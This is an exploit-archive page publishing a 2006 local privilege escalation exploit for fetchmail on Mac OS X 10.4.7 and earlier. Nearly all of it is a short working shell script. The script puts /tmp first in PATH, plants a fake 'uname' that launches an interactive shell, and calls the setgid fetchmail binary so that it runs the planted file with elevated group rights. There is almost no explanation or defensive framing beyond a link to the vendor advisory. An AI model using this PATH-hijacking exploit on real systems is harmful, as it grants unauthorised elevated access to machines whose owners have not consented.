[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit
# Published : 2006-08-01
# Author : Kevin Finisterre
# Previous Title : Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (ppc)
# Next Title : liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit
#!/bin/sh
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# http://docs.info.apple.com/article.html?artnum=106704
export PATH=/tmp:$PATH
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V
# www.Syue.com [2006-08-01]